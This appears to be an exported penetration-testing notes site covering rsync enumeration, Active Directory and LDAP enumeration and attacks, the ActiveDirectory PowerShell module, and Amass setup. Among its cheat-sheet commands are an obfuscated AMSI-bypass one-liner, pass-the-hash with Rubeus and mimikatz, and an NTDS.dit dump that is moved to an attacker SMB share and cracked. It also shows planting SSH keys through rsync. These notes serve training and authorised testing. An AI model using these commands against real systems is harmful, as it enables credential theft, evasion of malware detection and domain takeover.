                        rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers. It can be used to copy files locally on a given machine and to/from remote hosts. It is highly versatile and well-known for its delta-transfer algorithm. This algorithm reduces the amount of data transmitted over the network when a version of the file already exists on the destination host. It does this by sending only the differences between the source files and the older version of the files that reside on the destination server. It is often used for backups and mirroring. It finds files that need to be transferred by looking at files that have changed in size or the last modified time. By default, it uses port 873 and can be configured to use SSH for secure file transfers by piggybacking on top of an established SSH server connection.

                        ","tags":["rsync","port 873"]},{"location":"873-rsync/#footprinting-rsync","title":"Footprinting rsync","text":"
                        sudo nmap -sV -p 873 $ip\n

                        We can next probe the service a bit to see what we can gain access to:

                        nc -nv $ip 873\n
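
                        The daemon greets clients with its protocol banner; echoing the version back followed by #list enumerates modules over the raw socket (version and module output illustrative):

                        printf '@RSYNCD: 31.0\\n#list\\n' | nc $ip 873\n# @RSYNCD: 31.0\n# dev            Development share\n# @RSYNCD: EXIT\n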

                        If some share is returned, we could go further by enumerating the share:

                        rsync -av --list-only rsync://$ip/<nameOfShare>\n

                        nmap script to enumerate shares:

                        nmap -sV --script \"rsync-list-modules\" -p <PORT> $ip\n

                        metasploit module to enumerate shares

                        use auxiliary/scanner/rsync/modules_list\n

                        If IPv6 is in use:

                        # Example using IPv6 and a different port\nrsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730\n
                        ","tags":["rsync","port 873"]},{"location":"873-rsync/#connect-to-the-service","title":"Connect to the service","text":"
                        rsync rsync://IP\n
                        ","tags":["rsync","port 873"]},{"location":"873-rsync/#basic-rsync-commands","title":"Basic rsync commands","text":"

                        General syntax:

                        rsync [OPTION] ... [USER@]HOST::SRC [DEST]\n
                        # List content\nrsync IP::\n\n# List a directory recursively\nrsync -r IP::folder\n\n# Download a file from the server to your machine\nrsync IP::folder/sourcefile.txt destinationfile.txt\n\n# Download a folder\nrsync -r IP::folder ./localfolder\n
                        ","tags":["rsync","port 873"]},{"location":"873-rsync/#brute-force","title":"Brute force","text":"

                        Once you have the list of modules, you have a few different options depending on the actions you want to take and whether or not authentication is required. If authentication is not required, you can list a shared folder:

                        rsync -av --list-only rsync://$ip/<nameOfShared>\n

                        And copy all files to your local machine via the following command:

                        rsync -av rsync://$ip:8730/<nameOfShared> ./rsync_shared\n

                        This recursively transfers all files from the directory <nameOfShared> on the machine $ip into the ./rsync_shared directory on the local machine. The files are transferred in \"archive\" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer.

                        If you have credentials you can list/download a shared name using (the password will be prompted):

                        rsync -av --list-only rsync://<username>@$ip/<nameOfShared>\n\nrsync -av rsync://<username>@$ip:8730/<nameOfShared> ./rsync_shared\n

                        You could also upload some content using rsync (for example, in this case we can upload an authorized_keys file to obtain access to the box):

                        rsync -av home_user/.ssh/ rsync://<username>@$ip/home_user/.ssh\n
                        ","tags":["rsync","port 873"]},{"location":"acronyms/","title":"Acronyms","text":""},{"location":"acronyms/#a","title":"A","text":"Acronym Expression"},{"location":"acronyms/#b","title":"B","text":"Acronym Expression BFLA Broken Funtion Level Authorization BOLA Broken Access Level Authorization"},{"location":"acronyms/#c","title":"C","text":"Acronym Expression"},{"location":"acronyms/#d","title":"D","text":"Acronym Expression"},{"location":"acronyms/#e","title":"E","text":"Acronym Expression"},{"location":"acronyms/#f","title":"F","text":"Acronym Expression"},{"location":"acronyms/#g","title":"G","text":"Acronym Expression"},{"location":"acronyms/#h","title":"H","text":"Acronym Expression"},{"location":"acronyms/#i","title":"I","text":"Acronym Expression IGA Identity Governance and Administration ILM Identity Lifecycle Management"},{"location":"acronyms/#j","title":"J","text":"Acronym Expression"},{"location":"acronyms/#k","title":"K","text":"Acronym Expression"},{"location":"acronyms/#l","title":"L","text":"Acronym Expression"},{"location":"acronyms/#m","title":"M","text":"Acronym Expression"},{"location":"acronyms/#n","title":"N","text":"Acronym Expression"},{"location":"acronyms/#o","title":"O","text":"Acronym Expression OTP One Time Password"},{"location":"acronyms/#p","title":"P","text":"Acronym Expression"},{"location":"acronyms/#q","title":"Q","text":"Acronym Expression"},{"location":"acronyms/#r","title":"R","text":"Acronym Expression RBAC Role Based Access Control"},{"location":"acronyms/#s","title":"S","text":"Acronym Expression SOAP Simple Object Access Protocol SCIM System for Cross-domain Identity Management is a standard for automating the exchange of user identity information between service provider and identity providers. It helps with automating functions like provisioning or deprovisioning of users identities on applications integrated with the identity provider."},{"location":"acronyms/#t","title":"T","text":"Acronym Expression"},{"location":"acronyms/#u","title":"U","text":"Acronym Expression"},{"location":"acronyms/#v","title":"V","text":"Acronym Expression"},{"location":"acronyms/#w","title":"W","text":"Acronym Expression"},{"location":"acronyms/#x","title":"X","text":"Acronym Expression"},{"location":"acronyms/#y","title":"Y","text":"Acronym Expression"},{"location":"acronyms/#z","title":"Z","text":"Acronym Expression"},{"location":"active-directory-ldap/","title":"Active Directory - LDAP","text":"

                        Active Directory (AD) is a directory service for Windows network environments.

                        In the context of Active Directory, a forest is a collection of one or more domain trees that share a common schema and global catalog, while a domain is a logical unit within a forest that represents a security boundary for authentication and authorization purposes.

                        And what about LDAP? See here.

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#tools","title":"Tools","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#xfreerdp","title":"xfreerdp","text":"

                        See cheat sheet.

                        xfreerdp /v:$ip /u:htb-student /p:<password> /cert-ignore\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#rsat-remote-server-administration-tools","title":"RSAT (Remote Server Administration Tools)","text":"

                        RSAT (Remote Server Administration Tools) cheat sheet:

                        # Check if RSAT tools are installed\nGet-WindowsCapability -Name RSAT* -Online | Select-Object -Property Name, State\n\n# Install all RSAT tools\nGet-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online\n\n# Install a specific RSAT tool, for instance Rsat.ActiveDirectory.DS-LDS.Tools\nAdd-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online\n

                        Once installed, all of the tools will be available under: Control Panel> All Control Panel Items >Administrative Tools.

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypassing","title":"Bypassing","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypass-execution-policy","title":"Bypass Execution Policy","text":"
                        powershell -ep bypass\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypass-amsi","title":"Bypass AMSI","text":"
                        **S`eT-It`em ( 'V'+'aR' +\u00a0 'IA' + ('blE:1'+'q2')\u00a0 + ('uZ'+'x')\u00a0 ) ( [TYpE](\u00a0 \"{1}{0}\"-F'F','rE'\u00a0 ) )\u00a0 ;\u00a0 \u00a0 (\u00a0 \u00a0 Get-varI`A`BLE\u00a0 ( ('1Q'+'2U')\u00a0 +'zX'\u00a0 )\u00a0 -VaL\u00a0 ).\"A`ss`Embly\".\"GET`TY`Pe\"((\u00a0 \"{6}{3}{1}{4}{2}{0}{5}\" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')\u00a0 ) ).\"g`etf`iElD\"(\u00a0 ( \"{0}{2}{1}\" -f('a'+'msi'),'d',('I'+'nitF'+'aile')\u00a0 ),(\u00a0 \"{2}{4}{0}{1}{3}\" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'\u00a0 )).\"sE`T`VaLUE\"(\u00a0 ${n`ULl},${t`RuE} )**\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#run-a-utility-as-another-user","title":"Run a utility as another user","text":"
                        # Run a utility as another user\nrunas /netonly /user:htb.local\\jackie.may powershell\n\n# Run an utility as another user with rubeus. Passing clear text credentials\nrubeus.exe asktgt /user:jackie.may /domain:htb.local /dc:10.10.110.100 /rc4:ad11e823e1638def97afa7cb08156a94\n\n# Run an utility as another user with mimikatz.exe. Passing clear text credentials\nmimikatz.exe sekurlsa::pth /domain:htb.local /user:jackie.may /rc4:ad11e823e1638def97afa7cb08156a94\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#enumeration","title":"Enumeration","text":"

                        Basic reconnaissance: who am I, where am I, and what permissions do I have?

                        whoami\nhostname\nnet localgroup administrators\n\n# View a user's current rights\nwhoami /priv\n

                        Tools for enumeration:

                        • Enumeration with LDAP queries
                        • PowerView.ps1 from PowerSploit project (powershell).
                        • The ActiveDirectory PowerShell module (powershell).
                        • BloodHound (C# and PowerShell Collectors).
                        • SharpView (C#).

                        A basic AD user account with no added privileges can be used to enumerate the majority of objects contained within AD, including but not limited to:

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#1-domain-computers","title":"1. Domain Computers","text":"
                        # Use ADSI to search for all computers\n([adsisearcher]\"(&(objectClass=Computer))\").FindAll()\n\n#Query for installed software\nget-ciminstance win32_product \\| fl\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#2-domain-users","title":"2. Domain Users","text":"

                        There are two ways. First, if we compromise a domain-joined system (or a client has us perform an AD assessment from one of their workstations), we can leverage RSAT to enumerate AD (the Active Directory Users and Computers and ADSI Edit snap-ins). Second, we can enumerate the domain from a non-domain-joined host (provided it is in a subnet that communicates with a domain controller) by launching any RSAT snap-in using \"runas\" from the command line.

                        # Gets one or more Active Directory users.\nGet-ADUser\n\n# List disabled users\nGet-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select name\n\n# Count all users in an OU\n(Get-ADUser -SearchBase \"OU=Employees,DC=INLANEFREIGHT,DC=LOCAL\" -Filter *).count\n

                        We can also open the MMC Console from a non-domain-joined computer using the following command syntax (see here for how to work through the subsequent steps in the MMC interface):

                        runas /netonly /user:Domain_Name\\Domain_USER mmc\n

                        Also, NT Authority/System is a LocalSystem account built into Windows operating systems and used by the service control manager. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. The only real limitation is not being able to perform cross-trust Kerberos attacks such as Kerberoasting (see techniques to gain SYSTEM-level access on a host).

                        Enumerating with powerview.ps1
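
                        A minimal sketch (assuming PowerView.ps1 has already been transferred to the target; function names are from PowerView 3.0):

                        # Load PowerView into the current session\nImport-Module .\PowerView.ps1\n\n# Enumerate domain users\nGet-DomainUser \| select samaccountname\n\n# Enumerate the members of a privileged group\nGet-DomainGroupMember -Identity \"Domain Admins\"\n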

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#3-domain-group-information","title":"3. Domain Group Information","text":"
                        # Get all administrative groups \nGet-ADGroup -Filter \"adminCount -eq 1\" \\| select Name\n\n# LDAP query to return all AD groups\nGet-ADObject -LDAPFilter '(objectClass=group)' \\| select cn\n\n# Get AD groups using WMI \nGet-WmiObject -Class win32_group -Filter \"Domain='INLANEFREIGHT'\"\n\n# Get information about an specific AD group\nGet-ADGroup -Identity \"<GROUP NAME>\" -Properties *\n

                        Domain Groups of interest:

                        Get-ADGroup -Identity \"<GROUP NAME>\" -Properties *\n

                        These are some groups with special permissions that, if misconfigured, might be exploited:

                        # Schema Admins | The Schema Admins group is a highly privileged group in a forest root domain. The membership of this group must be limited. This group is used to modify the schema of the forest. Additional accounts must only be added when changes to the schema are necessary and then must be removed. By default, the Administrator account is a member of this group. Because this group has significant power in the forest, add users with caution. Members can modify the Active Directory schema structure and can backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL.\nGet-ADGroup -Identity \"Schema Admins\" -Properties *\n\n# Default Administrators | Domain Admins and Enterprise Admins \"super\" groups. A built-in group that grants complete and unrestricted access to the computer, or if the computer is promoted to a domain controller, members have unrestricted access to the domain. This group cannot be renamed, deleted, or moved. This built-in group controls access to all the domain controllers in its domain, and it can change the membership of all administrative groups. Membership can be modified by members of the following groups: the default service Administrators, Domain Admins in the domain, or Enterprise Admins.\nGet-ADGroup -Identity \"Administrators\" -Properties *\n\n# Server Operators | A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. Members can modify services, access SMB shares, and back up files.\nGet-ADGroup -Identity \"Server Operators\" -Properties *\n\n# Backup Operators | A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down. Members are allowed to log on to DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs.\nGet-ADGroup -Identity \"Backup Operators\" -Properties *\n\n# Print Operators | A built-in group that exists only on domain controllers. By default, the group has no members. Print Operators can manage printers and document queues. They can also manage Active Directory printer objects in the domain. Members of this group can locally sign in to and shut down domain controllers in the domain. Because members of this group can load and unload device drivers on all domain controllers in the domain, add users with caution. This group cannot be renamed, deleted, or moved. Members are allowed to log on to DCs locally and \"trick\" Windows into loading a malicious driver.\nGet-ADGroup -Identity \"Print Operators\" -Properties *\n\n# Hyper-V Administrators | Members of the Hyper-V Administrators group have complete and unrestricted access to all the features in Hyper-V. Adding members to this group helps reduce the number of members required in the Administrators group, and further separates access. If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins.\nGet-ADGroup -Identity \"Hyper-V Administrators\" -Properties *\n\n# Account Operators | Grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers. Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights. Members can modify non-protected accounts and groups in the domain.\nGet-ADGroup -Identity \"Account Operators\" -Properties *\n\n# Remote Desktop Users | The Remote Desktop Users group on an RD Session Host server is used to grant users and groups permissions to remotely connect to an RD Session Host server. This group cannot be renamed, deleted, or moved. It appears as a SID until the domain controller is made the primary domain controller and it holds the operations master role (also known as flexible single master operations or FSMO). Members are not given any useful permissions by default but are often granted additional rights such as \"Allow log on through Remote Desktop Services\" and can move laterally using the RDP protocol.\nGet-ADGroup -Identity \"Remote Desktop Users\" -Properties *\n\n# Remote Management Users | Members of the Remote Management Users group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. The Remote Management Users group is generally used to allow users to manage servers through the Server Manager console, whereas the WinRMRemoteWMIUsers_ group allows remotely running Windows PowerShell commands. Members are allowed to log on to DCs with PSRemoting (this group is sometimes added to the local remote management group on non-DCs).\nGet-ADGroup -Identity \"Remote Management Users\" -Properties *\n\n# Group Policy Creator Owners | A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator. The default owner of a new Group Policy object is usually the user who created it. If the user is a member of Administrators or Domain Admins, all objects that are created by the user are owned by the group. Owners have full control of the objects they own. Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU.\nGet-ADGroup -Identity \"Group Policy Creator Owners\" -Properties *\n\n# DNSAdmins | Members of this group have administrative access to the DNS Server service. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group has no default members. Members have the ability to load a DLL on a DC but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record.\nGet-ADGroup -Identity \"DNSAdmins\" -Properties *\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#4-default-domain-policy","title":"4. Default Domain Policy","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#5-domain-functional-levels","title":"5. Domain Functional Levels","text":"
                        # Get hostnames with the word \"SQL\" in their hostname \nGet-ADComputer  -Filter \"DNSHostName -like 'SQL*'\"\n

                        6. Password Policy
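
                        For example (assuming the ActiveDirectory module is available; net accounts is built into any domain-joined host):

                        # View the default domain password policy with the AD module\nGet-ADDefaultDomainPasswordPolicy\n\n# Or query it from any domain-joined host\nnet accounts /domain\n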

                        7. Group Policy Objects (GPOs)
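
                        A quick sketch (assuming the GroupPolicy RSAT module is installed):

                        # List all GPOs in the current domain\nGet-GPO -All \| select DisplayName\n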

                        8. Kerberos Delegation

                        # Find admin users that don't require Kerberos Pre-Auth\nGet-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'}\n
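
                        The query above flags ASREPRoast candidates; for delegation itself, one assumed AD-module check (TrustedForDelegation is the unconstrained-delegation flag):

                        # Find computers trusted for unconstrained delegation\nGet-ADComputer -Filter {TrustedForDelegation -eq $true} \| select name\n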

                        9. Domain Trusts
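
                        For example (assuming the ActiveDirectory module is available; nltest is built into Windows):

                        # Enumerate all trusts for the current domain\nGet-ADTrust -Filter *\n\n# Or with the built-in nltest utility\nnltest /domain_trusts\n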

                        10. Access Control Lists (ACLs)

                        #  Enumerate UAC values for admin users\nGet-ADUser -Filter {adminCount -gt 0} -Properties admincount,useraccountcontrol \n

                        11. Remote access rights
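
                        A hedged PowerView sketch (SRV01 is a hypothetical host; Get-NetLocalGroupMember is a PowerView 3.0 function):

                        # Who can RDP into a given host?\nGet-NetLocalGroupMember -ComputerName SRV01 -GroupName \"Remote Desktop Users\"\n\n# Who can WinRM/PSRemote into it?\nGet-NetLocalGroupMember -ComputerName SRV01 -GroupName \"Remote Management Users\"\n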

                        Active Directory is easy to misconfigure. These are common attacks:

                        • Kerberoasting / ASREPRoasting
                        • NTLM Relaying
                        • Network traffic poisoning
                        • Password spraying
                        • Kerberos delegation abuse
                        • Domain trust abuse
                        • Credential theft
                        • Object control
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#cheat-sheet-so-far","title":"Cheat sheet so far","text":"Command Description xfreerdp /v:$ip /u:htb-student /p:<password> RDP to lab target Get-ADGroup -Identity \"<GROUP NAME\"> -Properties * Get information about an AD group whoami /priv View a user's current rights Get-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State Check if RSAT tools are installed Get-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability \u2013Online Install all RSAT tools runas /netonly /user:htb.local\\jackie.may powershell Run a utility as another user Get-ADObject -LDAPFilter '(objectClass=group)' \\| select cn LDAP query to return all AD groups Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' \\| select name List disabled users (Get-ADUser -SearchBase \"OU=Employees,DC=INLANEFREIGHT,DC=LOCAL\" -Filter *).count Count all users in an OU get-ciminstance win32_product \\| fl Query for installed software Get-ADComputer -Filter \"DNSHostName -like 'SQL*'\" Get hostnames with the word \"SQL\" in their hostname Get-ADGroup -Filter \"adminCount -eq 1\" \\| select Name Get all administrative groups Get-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'} Find admin users that don't require Kerberos Pre-Auth Get-ADUser -Filter {adminCount -gt 0} -Properties admincount,useraccountcontrol Enumerate UAC values for admin users Get-WmiObject -Class win32_group -Filter \"Domain='INLANEFREIGHT'\" Get AD groups using WMI ([adsisearcher]\"(&(objectClass=Computer))\").FindAll() Use ADSI to search for all computers","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#acronyms","title":"Acronyms","text":"

                        ADSI

                        Active Directory Service Interfaces (ADSI) is a set of COM interfaces used to access the features of directory services from different network providers. ADSI is used in a distributed computing environment to present a single set of directory service interfaces for managing network resources. Administrators and developers can use ADSI services to enumerate and manage the resources in a directory service, no matter which network environment contains the resource. ADSI enables common administrative tasks, such as adding new users, managing printers, and locating resources in a distributed computing environment.

                        CIM The Common Information Model (CIM) is the Distributed Management Task Force (DMTF) standard [DSP0004] for describing the structure and behavior of managed resources such as storage, network, or software components. One way to describe CIM is to say that it allows multiple parties to exchange management information about these managed elements. However, this falls short of fully capturing CIM's ability not only to describe these managed elements and the management information, but also to actively control and manage them. By using a common model of information, management software can be written once and work with many implementations of the common model without complex and costly conversion operations or loss of information.

                        DIT Directory Information Tree.

                        MMC You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system.

                        OU

                        An OU is a container within a Microsoft Windows Active Directory (AD) domain that can hold users, groups, and computers. It is the smallest unit to which an administrator can assign Group Policy settings or account permissions.

                        RSAT

                        The Remote Server Administration Tools (RSAT) have been part of Windows since the days of Windows 2000. RSAT allows systems administrators to remotely manage Windows Server roles and features from a workstation running Windows 10, Windows 8.1, Windows 7, or Windows Vista. RSAT can only be installed on Professional or Enterprise editions of Windows.

                        SID

                        In the context of the Microsoft Windows NT line of operating systems, a Security Identifier is a unique, immutable identifier of a user, user group, or other security principal.

                        SPN

                        A service principal name (SPN) is\u00a0a unique identifier of a service instance. Kerberos authentication uses SPNs to associate a service instance with a service sign-in account. Doing so allows a client application to request service authentication for an account even if the client doesn't have the account name.

                        UAC

                        User Account Control (UAC) is a fundamental component of Microsoft's overall security vision. UAC helps mitigate the impact of malware.

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#attacking-active-directory","title":"Attacking Active Directory","text":"

                        Once a Windows system is joined to a domain, it will no longer default to referencing the SAM database to validate logon requests. That domain-joined system will now send all authentication requests to be validated by the domain controller before allowing a user to log on.

                        If needed, use tools like Username Anarchy to create lists of usernames, as in the sketch below.
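
                        A hedged example (names.txt is a hypothetical file of \"First Last\" names; the flags are assumptions based on the username-anarchy README):

                        # Generate candidate usernames in common formats from a list of full names\n./username-anarchy --input-file names.txt --select-format first,flast,first.last > usernames.txt\n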

                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#1-dumping-ntdsdit","title":"1. Dumping ntds.dit","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#dumping-ntdsdit-locally","title":"Dumping ntds.dit locally","text":"

                        NT Directory Services (NTDS) is the directory service used with AD to find and organize network resources. Recall that the NTDS.dit file is stored at %systemroot%\NTDS on the domain controllers in a forest.

                        The .dit stands for directory information tree. This is the primary database file associated with AD; it stores all domain usernames, password hashes, and other critical schema information. If this file can be captured, we could potentially compromise every account on the domain.

                        # Connect to a DC with Evil-WinRM\nevil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'\n\n# To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights. Check Local Group Membership:\n*Evil-WinRM* PS C:\\> net localgroup\n\n# Check User Account Privileges including Domain. If the account has both Administrators and Domain Administrator rights, this means we can do just about anything we want, including making a copy of the NTDS.dit file.\nnet user <username>\n\n# Use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD. Create a Shadow Copy of C:\n*Evil-WinRM* PS C:\\> vssadmin CREATE SHADOW /For=C:\n\n# Copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.\n*Evil-WinRM* PS C:\\NTDS> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit\n

                        Launch smbserver in our attacker machine:

                        sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

                        Now, from PS in the victim's windows machine:

                        # Transfer the file to attacker machine\ncmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n

                        And... crack the hash with hashcat:

                        sudo hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt\n
                        ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#dumpins-ntdsdit-remotely","title":"Dumpins ntds.dit remotely","text":"
                        crackmapexec smb $ip -u <username> -p <password> --ntds\n
                        ","tags":["active directory","ldap","windows"]},{"location":"activedirectory-powershell-module/","title":"The ActiveDirectory PowerShell module","text":"

                        The Active Directory module for Windows PowerShell is a PowerShell module that consolidates a group of cmdlets. You can use these cmdlets to manage your Active Directory domains, Active Directory Lightweight Directory Services (AD LDS) configuration sets, and Active Directory Database Mounting Tool instances in a single, self-contained package.

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#installation","title":"Installation","text":"

                        Download from The ActiveDirectory PowerShell module github repository

                        This module is Microsoft signed and works even in PowerShell Constrained Language Mode (CLM).

                        Import-Module .\\ADModule-master\\Microsoft.ActiveDirectory.Management.dll\u00a0\n\nImport-Module .\\ADModule-master\\ActiveDirectory\\ActiveDirectory.psd1\u00a0\n

                        Also, you can copy the DLL from the github repo to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges.

                        Import-Module C:\\ADModule\\Microsoft.ActiveDirectory.Management.dll -Verbose\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#basic-commands","title":"Basic commands","text":"
                        # Get the ACL for a folder (or a file)\nGet-ACL \"C:\Users\Public\Desktop\"\n\n# Search for AD elements. [See more in ldap queries](ldap.md)\nGet-ADObject -LDAPFilter <thespecificfilter>\n\n# Count occurrences in a query, like the one above\n(Get-ADObject -LDAPFilter <thespecificfilter>).count\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-aduser","title":"Get-ADUser","text":"

                        More on https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps.

                        # This command gets all users in the container OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM.\nGet-ADUser -Filter * -SearchBase \"OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM\"\n\n# This command gets all users that have a name that ends with SvcAccount:\nGet-ADUser -Filter 'Name -like \"*SvcAccount\"' | Format-Table Name,SamAccountName -A\n\n# This command gets all of the properties of the user with the SAM account name ChewDavid:\nGet-ADUser -Identity ChewDavid -Properties *\n\n# This command gets the user with the name ChewDavid in the Active Directory Lightweight Directory Services (AD LDS) instance:\nGet-ADUser -Filter \"Name -eq 'ChewDavid'\" -SearchBase \"DC=AppNC\" -Properties \"mail\" -Server lds.Fabrikam.com:50000\n\n# This command gets all enabled user accounts in Active Directory using an LDAP filter:\nGet-ADUser -LDAPFilter '(!userAccountControl:1.2.840.113556.1.4.803:=2)'\n\n# search for all administrative users with the `DoesNotRequirePreAuth` attribute set, meaning that they can be ASREPRoasted:\nGet-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'}\n\n# Find all administrative users with the SPN \"servicePrincipalName\" attribute set, meaning that they can likely be subject to a Kerberoasting attack\nGet-ADUser -Filter \"adminCount -eq '1'\" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adcomputer","title":"Get-ADComputer","text":"
                        # Search domain computers for interesting hostnames. SQL servers are a particularly juicy target on internal assessments. The below command searches all hosts in the domain using `Get-ADComputer`, filtering on the `DNSHostName` property that contains the word `SQL`\nGet-ADComputer  -Filter \"DNSHostName -like 'SQL*'\"\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adgroup","title":"Get-ADGroup","text":"
                        # Search for administrative groups by filtering on the `adminCount` attribute. If set to `1`, it's protected by AdminSDHolder and known as protected groups. `AdminSDHolder` is owned by the Domain Admins group. It has the privileges to change the permissions of objects in Active Directory. \nGet-ADGroup -Filter \"adminCount -eq 1\" | select Name\n
                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"activedirectory-powershell-module/#get-adobject","title":"Get-ADObject","text":"","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"amass/","title":"Amass","text":"

                        In-depth DNS enumeration and network mapping. Amass combines active and passive fingerprinting, so being conscious of which mode you are using is really important. It's an assessment tool with reporting features.

                        ","tags":["dns enumeration","enumeration","tools"]},{"location":"amass/#install","title":"Install","text":"
                        apt install snapd\nservice snapd start\nsnap install amass\n

                        Before diving into using Amass, we should make the most of it by adding API keys to it.

                        1. First, we can see which data sources are available for Amass (paid and free) by running:

                        amass enum -list \n

                        2. Next, we will need to create a config file to add our API keys to.

                        sudo curl https://raw.githubusercontent.com/OWASP/Amass/master/examples/config.ini >~/.config/amass/config.ini\n

                        3. Now, review the file ~/.config/amass/config.ini and register with as many services as you can. Once you have obtained your API ID and secret, edit the config.ini file and add the credentials to it.

                        sudo nano ~/.config/amass/config.ini\n
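
                        An illustrative entry (the exact section names vary by Amass version and data source; Censys is used here as an example):

                        [data_sources.Censys]\n[data_sources.Censys.Credentials]\napikey = <your-api-id>\nsecret = <your-secret>\n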

                        4. Now, edit the file to add the sources. It is recommended to add:

                        • censys.io: takes the guesswork out of understanding and protecting your organization's digital footprint.
                        • https://asnlookup.com: Quickly lookup updated information about specific Autonomous System Number (ASN), Organization, CIDR, or registered IP addresses (IPv4 and IPv6) among other relevant data. We also offer a free and paid API access!
                        • https://otx.alienvault.com: Quickly identify if your endpoints have been compromised in major cyber attacks using OTX Endpoint Security and many other.
                        • https://bigdatacloud.com
                        • https://cloudflare.com
                        • https://www.digicert.com/tls-ssl/certcentral-tls-ssl-manager:
                        • https://fullhunt.io
                        • https://github.com
                        • https://ipdata.co
                        • https://leakix.net
                        • as many more as you can.

                        5. When ready, we can run amass:

                        ","tags":["dns enumeration","enumeration","tools"]},{"location":"amass/#basic-usage","title":"Basic usage","text":"
